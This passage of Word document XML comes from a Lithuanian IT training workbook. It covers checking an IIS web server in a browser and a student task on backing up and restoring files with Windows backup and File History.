      </w:r>
    </w:p>
    <w:p w14:paraId="01372B7D" w14:textId="33E6049A" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4B4BC2" w14:textId="77777777" w:rsidR="00977221" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723C201A" w14:textId="46E8A266" w:rsidR="5E5B3320" w:rsidRPr="005A5C28" w:rsidRDefault="621F0956" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47AC8F85" wp14:editId="74280B51">
            <wp:extent cx="4572000" cy="3257550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1713629013" name="Paveikslėlis 171362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13629013"/>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321C2505" w14:textId="1158C67F" w:rsidR="482C5CD2" w:rsidRPr="005A5C28" w:rsidRDefault="482C5CD2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BF7B83" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Rolės pridėjimas ir vedlio nuostatos. Konfigūravimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC0789" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computingforgeeks. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D3BF0" w14:textId="7811A1B2" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE1D211" w14:textId="61767AF7" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">8 žingsnis: </w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:t>Pasitikrinkite</w:t>
      </w:r>
      <w:r w:rsidR="6EEE12D6" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> ar</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> veikia tinklo serveris</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C674786" w14:textId="09361F33" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="007554D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Paleiskite interneto</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> naršyklę serveryje arba kompiuteryje, kuris gali pasiekti jūsų IIS serverio tinklą ir įves</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> jo IP adresą naršyklės paieškoje, kaip parodyta žemiau. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362AB07" w14:textId="63A1FF5F" w:rsidR="73B2C0AD" w:rsidRPr="005A5C28" w:rsidRDefault="78BD6860" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C7647BF" wp14:editId="49C3AC0E">
            <wp:extent cx="4572000" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1386387842" name="Paveikslėlis 13863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86387842"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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1A0B4A01" w14:textId="0E51B496" w:rsidR="3DD790DE" w:rsidRPr="005A5C28" w:rsidRDefault="3DD790DE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BF7B83" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Rolės pridėjimas ir vedlio nuostatos. Konfigūravimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCB0600" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computingforgeeks. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569AFFD7" w14:textId="2B25E9B6" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD682C2" w14:textId="77777777" w:rsidR="002A5374" w:rsidRPr="005A5C28" w:rsidRDefault="002A5374" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>9 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PANAUDOJANT WINDOWS OPERACINĖS SISTEMOS ĮRANKIUS SUKURTI DUOMENŲ ATSARGINĘ KOPIJĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E108F38" w14:textId="4369B3D4" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="16E6C2B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="16E6C2B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="16E6C2B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti ekrano vaizdus</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="16E6C2B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kaip sukuriamos duomenų kopijos naudojantis</w:t>
      </w:r>
      <w:r w:rsidR="16E6C2B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="16E6C2B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>WINDOWS įrankiais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0AE428" w14:textId="0CDE16CB" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733EB92" w14:textId="4502A246" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidR="3A827C58" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pradėti</w:t>
      </w:r>
      <w:r w:rsidR="2557FB0F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="46F1A42B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="63DF9C57" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidR="4C512534" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>” -</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="03890114" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atnaujinimas ir sauga</w:t>
      </w:r>
      <w:r w:rsidR="1C4AC3DE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="38C71E13" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="7F64C23E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atsarginė kopija</w:t>
      </w:r>
      <w:r w:rsidR="521A9CBC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>” -</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="6176AF29" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pridėti diską</w:t>
      </w:r>
      <w:r w:rsidR="28D41106" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, tada pasirinkite išorinį diską arba tinklo vietą atsarginėms kopijoms kurti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8447E" w14:textId="6AE926D4" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16A11560" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="752AEF6F" wp14:editId="090D2C5B">
            <wp:extent cx="3724275" cy="2114550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1557299738" name="Picture 155729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299738"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId235">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3724275" cy="2114550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D68947A" w14:textId="5394F87E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00BF7B83" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="16E6C2B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Windows įrankiai skirti duomenų kopijoms kurti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046FE1F2" w14:textId="6901756C" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Backup and Restore in Windows 10. </w:t>
      </w:r>
      <w:r w:rsidR="382E3DE8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId236">
        <w:r w:rsidR="2F05F481" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DBAD08A" w14:textId="47104E32" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EFDF843" w14:textId="34052E61" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atkurkite failus naudodami failų istoriją</w:t>
      </w:r>
      <w:r w:rsidR="003579CB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186E98AD" w14:textId="6431C369" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jei trūksta svarbaus failo ar aplanko, atlikite toliau nurodytus veiksmus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F0BFE" w14:textId="30D7C665" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Užduočių juostos paieškos laukelyje įveskite failų </w:t>
      </w:r>
      <w:r w:rsidR="2073EBB0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tkūrimas ir pasirinkite</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Atkurti failus naudodami failų istoriją“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35111241" w14:textId="23E6BA48" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ieškokite reikalingo failo</w:t>
      </w:r>
      <w:r w:rsidR="001C0B2B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C0B2B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>audokite rodykles, kad pamatytumėte visas jo versijas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D9784" w14:textId="3F3243C1" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="16E6C2B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Radę norimą versiją, pasirinkite</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
